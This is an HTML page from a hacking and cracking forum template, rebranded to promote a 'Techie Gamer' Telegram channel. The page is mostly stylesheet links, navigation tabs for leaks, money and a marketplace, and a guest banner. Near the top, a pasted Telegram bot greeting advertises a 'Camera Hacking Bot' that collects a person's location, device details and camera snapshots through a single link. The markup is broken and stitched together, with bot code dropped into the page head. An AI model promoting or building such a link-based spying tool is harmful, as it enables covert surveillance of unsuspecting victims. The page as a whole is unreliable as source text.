
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: index -->
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<title>Techie Gamer</title>
  
{
bot.sendMessage(chatId, `Welcome ${msg.chat.first_name} ! , \nYou can use this bot to Camera Hacking Bot people just through a simple link.\n\nIt can gather informations like location , device info, camera snaps.\n\nJoin @TechieGamer for more tool.\n\nType /help for more info.`,m);
}

<meta name="theme-color" content="#5f4c93"/>
<!-- RESPONSIVE -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- RESPONSIVE -->

<link rel="Shortcut icon" href="https://leakzone.net/favicon.ico" />
<!-- FONT ICONS -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.13.0/css/all.css" integrity="sha384-Bfad6CLCknfcloXFOyFnlgtENryhrpZCe29RTifKEixXQZ38WheV+i/6YWSzkz3V" crossorigin="anonymous">
<script src="https://kit.fontawesome.com/b52916f59f.js" crossorigin="anonymous"></script>
<!-- FONT ICONS -->

<link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="https://leakzone.net/syndication.php" />
<link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="https://leakzone.net/syndication.php?type=atom1.0" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<script type="text/javascript" src="https://leakzone.net/jscripts/jquery.js?ver=1821"></script>
<script type="text/javascript" src="https://leakzone.net/jscripts/jquery.plugins.min.js?ver=1821"></script>
<script type="text/javascript" src="https://leakzone.net/jscripts/general.js?ver=1821"></script>




<script type="text/javascript" src="https://leakzone.net/jscripts/avatarep.js?ver=299"></script><script language="javascript" type="text/javascript" src="https://leakzone.net/jscripts/myadvertisements.js"></script>
<script language="javascript" type="text/javascript" src="https://leakzone.net/jscripts/myadvertisements.js"></script>

    <!-- StatusFeed --> 
    <script type="text/javascript" src="https://leakzone.net/jscripts/statusfeed.js?ver=1824"></script>
    <script type="text/javascript" src="https://leakzone.net/jscripts/jquery-ui-tooltip.min.js?ver=1824"></script> 
    <!-- /StatusFeed -->
    <link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/global.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/thread_status.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/css3.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/custom.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/Responsive.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/extra.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/avatarep.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/flyover.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/Shoutbox.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/Checkbox.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/thx_buttons.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/activity_system.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme1/mentionme.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme1/onlinetoday.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/hovercards.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/tags.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/TitleStyle.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/errors.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/cache/themes/theme23/newcss.min.css" />
<link type="text/css" rel="stylesheet" href="https://leakzone.net/css.php?stylesheet%5B0%5D=201&stylesheet%5B1%5D=278&stylesheet%5B2%5D=275" />
<!-- start: ougcfeedback_js -->
<script type="text/javascript" src="https://leakzone.net/jscripts/ougc_feedback.js?ver=1824"></script>
<!-- end: ougcfeedback_js -->
 <style>.giveaways_green { background-color: #64dc6475; }</style>
 <style>.giveaways_green { background-color: #64dc6475; }</style><!-- start: ougcawards_js -->
<script type="text/javascript" src="https://leakzone.net/jscripts/ougc_awards.js"></script>
<!-- end: ougcawards_js -->
</head>
<body>
	<!-- WELCOME GUEST MESSAHE -->

<div class="guestmsbig12 wrapper">
<div class="textguestmsbig12">
<div class="mobilewelcomefontstittle" style="font-size: 2rem;margin: auto;display: flex;font-family: monospace;"><div style="color: #aaa;">Hi I,am Suman For</div> <div id="spingueststxt"></div></div>
<style>
@keyframes spin {
  0% { content:"Hackers"; }
  30% { content:"Web Developer"; }
  50% { content:"Programmers"; }
  60% { content:"Gamers"; }
  70% { content:"Gamers"; }
  80% { content:"Teacher"; }
  90% { content:"Programmers"; }
  100% { content:"Stressers"; }
	}
</style>
<p class="mobiledescguestittless" style="font-size: 18px;">Hello, I'm SUMAN from India.</p>
<p class="mobiledescguestittless" style="font-size: 18px;">I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty. </p>
<a href="https://telegram.dog/TechieGamer"><button class="creananaccountguestbutton"><i class="fas fa-user-circle"></i> JOIN TELEGRAM</button></a> 
<a href="https://www.TechieGamer.org/" ><button class="logincreananaccountguestbutton"><i class="fas fa-browser"></i>WEBSITE</button></a>
</div>
<div class="imagegeustmsgbig12">			
<div class="containerofthemap">
  <div class="map-container">
    <img src="https://leakzone.net//images/guest-map.png">
    <div class="point venezuela tippy" title="Venezuela"></div>
    <div class="point brasil tippy" title="Brasil"></div>
    <div class="point argentina tippy" title="Argentina"></div>
    <div class="point colombia tippy" title="Colombia"></div>
    <div class="point Panama tippy" title="Panama"></div>
    <div class="point mexico tippy" title="Mexico"></div>
	 <div class="point Canada tippy" title="Canada"></div>
    <div class="point usa tippy" title="United States"></div>
    <div class="point arabia tippy" title="Arabia Saudi"></div>
    <div class="point Turkey tippy" title="Turkey"></div>     
	<div class="point Greece tippy" title="Greece"></div>  
    <div class="point Russia tippy" title="Russia"></div>
	     <div class="point Greenland tippy" title="Greenland"></div>
    <div class="point china tippy" title="China"></div>
    <div class="point Japan tippy" title="Japan"></div>
	 <div class="point Indonesia tippy" title="Indonesia"></div>
	 	 <div class="point India tippy" title="India"></div>
    <div class="point australia tippy" title="Australia"></div>
	      <div class="point s-africa tippy" title="South africa"></div>
	  	      <div class="point Algeria tippy" title="Algeria"></div>
	  	  	      <div class="point Egypt tippy" title="Egypt"></div>
	  	  	      <div class="point Madagascar tippy" title="Madagascar"></div>

  </div></div></div></div>
<!-- WELCOME GUEST MESSAHE -->
<!-- start: header -->
<div id="container">
		<a name="top" id="top"></a>
		<div id="header">
			<div id="logo">
					<center><a href="https://www.TechieGamer.org/"><img class="logo-index forulogohideinguests" src="https://leakzone.net/images/lz-pirate.png" alt="Leak Zone - Leaking & Cracking Forum" title="Leak Zone - Leaking & Cracking Forum" /></a></center>
			</div>
	<div id="panel">		
					<!-- </div> in header_welcomeblock_member and header_welcomeblock_guest -->
				<!-- </div> in header_welcomeblock_member and header_welcomeblock_guest -->		

<!-- STYLESHEET FOR GUESTS -->	
<style>.forulogohideinguests{display:none;}.wrapper{padding-left: 0px!important;}.primnavnavnav{display:none;}@media screen and (max-width: 649px) {.primnavnavnav{display: block;}.wrapper{margin-top: 70px;}}</style>
<!-- STYLESHEET FOR GUESTS -->	

	
</div>
		</div>
		<div id="content">

		<!-- HEADER BAR -->		
			<nav class="primnavnavnav"></nav>

			
			
<user id="user">
	<!-- start: header_welcomeblock_guest -->
<div style="padding: 6px 4px 0px 0px;" class="floatright">
<div class="guests-message-toreg">
	
	
		
<a class="top-register-btnm welcome" href="https://termux.xyz/"><i class="guestsiocns-toreg fas fa-sign-in-alt"></i> Termux Website</a>


&nbsp;
<a class="top-register-btnm" href="https://www.TechieGamer.org/"><i class="guestsiocns-toreg fas fa-user-plus"></i> Hacking Website</a>


			
	</div>
</div>

	<script type="text/javascript">
					$("#quick_login input[name='url']").val($(location).attr('href'));
				</script>






<flyover_login_box>
<!-- end: header_welcomeblock_guest_login_modal -->
						</table>
					</form>
				</div>
<!-- end: header_welcomeblock_guest -->
</user>

<content>
  <nav class="tabs__nav">
    <ul>
      <li><a class="tab" href="/">HOME</a></li>
      <li><a class="tab" href="/newpoints.php?action=stats">SHOP</a></li>
      <li><a class="tab" href="/upgrade.php">UPGRADE</a></li>
      <li><a class="tab wilhide-inmobiddsw2" href="/awards.php">AWARDS</a></li>
		<li><a class="tab" href="/search.php">SEARCH</a></li>
		<li></li>
      <li><a class="tab" href="/misc.php?action=help">HELP</a></li>
    </ul>
  </nav>
</content>	
		<!-- HEADER BAR -->		
			

<!-- end: header -->
<div style="background-color: #7c58db; padding: 7px; border-radius: 4px; text-align: center; color: #fff; margin-top: -16px">Cyber Security Advabced Ethical Hacking Online Hacking. | Penetration Testing & Bug Bounty  |  <strong><a href="https://telegram.me/TechieGamer" style="color:#00ffc4">Join Telegram</a></strong></div>
<br class="clear" />
<div class="sidebar" style="float: right;width: 25%;">
<table border="0" cellspacing="0" cellpadding="5" class="tborder">
<tr>



<!-- end: dvz_shoutbox -->
<center>
<div style="display: flex; flex-wrap: wrap">
	<div style="flex-wrap: wrap!important; flex: 3.5">
		
<div id="mytabs_full">
<div id="tab_nav"><div id="tab_nav_10" style=""><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style_selected"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_11" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style_selected"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_12" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style_selected"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_18" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style_selected"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_16" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style_selected"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_13" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style_selected"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div><div id="tab_nav_14" style="display: none;"><div class="tabs"><a href="?tab=10" onclick="return switchTab('10', false);"><div class="tab_style"><i class="fa fa-home"></i> General</div></a><a href="?tab=11" onclick="return switchTab('11', false);"><div class="tab_style"><i class="fa fa-upload"></i> Leaks</div></a><a href="?tab=12" onclick="return switchTab('12', false);"><div class="tab_style"><i class="fa fa-desktop"></i> Computing</div></a><a href="?tab=18" onclick="return switchTab('18', false);"><div class="tab_style"><i class="fas fa-user-friends"></i> Groups</div></a><a href="?tab=16" onclick="return switchTab('16', false);"><div class="tab_style"><i class="fa fa-dollar-sign"></i> Money</div></a><a href="?tab=13" onclick="return switchTab('13', false);"><div class="tab_style"><i class="fa fa-store-alt"></i> Marketplace</div></a><a href="?tab=14" onclick="return switchTab('14', false);"><div class="tab_style_selected"><i class="fa fa-gem"></i> Premium</div></a></div><br /></div>
</div
<div id="tab_content" style=""></center>
<!-- Begin processing tab[10] -->

